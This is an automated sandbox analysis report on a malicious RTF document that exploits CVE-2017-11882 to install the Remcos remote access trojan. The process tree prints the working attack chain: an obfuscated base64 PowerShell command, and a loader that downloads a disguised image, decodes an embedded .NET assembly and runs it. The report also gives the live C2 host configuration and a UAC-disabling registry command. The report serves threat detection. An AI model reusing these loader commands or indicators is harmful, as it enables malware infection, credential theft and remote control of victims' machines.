Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf

Overview

General Information

Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
Analysis ID:1520534
MD5:5d0660bf632fd0fa66bc638775eb4b88
SHA1:f55a1c4a78252cc765f1747c321d0812ae0f9f38
SHA256:c3c93d712f93c4abe746760e31182f3cd5dfea00cb99176322f843ac20096697
Tags:rtf
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3336 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3420 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3580 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?QwBT? ? ? ? ?EU? ? ? ? ?R? ? ? ? ?BS? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?y? ? ? ? ?DI? ? ? ? ?Lw? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?Mw? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?NQ? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?1? ? ? ? ?Dg? ? ? ? ?MQ? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBw? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?FI? ? ? ? ?ZQBn? ? ? ? ?EE? ? ? ? ?cwBt? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3844 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "camzeroconnect.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GT4655", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x12cc:$obj2: \objdata
  • 0x12b2:$obj3: \objupdate
  • 0x128f:$obj4: \objemb

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\~WRD0000.tmpINDICATOR_RTF_EXPLOIT_CVE_2017_8759_2detects CVE-2017-8759 weaponized RTF documents.ditekSHen
  • 0xabd5:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
  • 0xac1f:$ole2: d0cf11e0a1b11ae1
  • 0x5699:$obj2: \objdata
  • 0x5677:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4b8:$a1: Remcos restarted by watchdog!
          • 0x6ca30:$a3: %02i:%02i:%02i:%03i
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          9.2.RegAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            9.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              9.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                9.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6aab8:$a1: Remcos restarted by watchdog!
                • 0x6b030:$a3: %02i:%02i:%02i:%03i
                9.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x64b7c:$str_b2: Executing file:
                • 0x65bfc:$str_b3: GetDirectListeningPort
                • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x65728:$str_b7: \update.vbs
                • 0x64ba4:$str_b9: Downloaded file:
                • 0x64b90:$str_b10: Downloading file:
                • 0x64c34:$str_b12: Failed to upload file:
                • 0x65bc4:$str_b13: StartForward
                • 0x65be4:$str_b14: StopForward
                • 0x65680:$str_b15: fso.DeleteFile "
                • 0x65614:$str_b16: On Error Resume Next
                • 0x656b0:$str_b17: fso.DeleteFolder "
                • 0x64c24:$str_b18: Uploaded file:
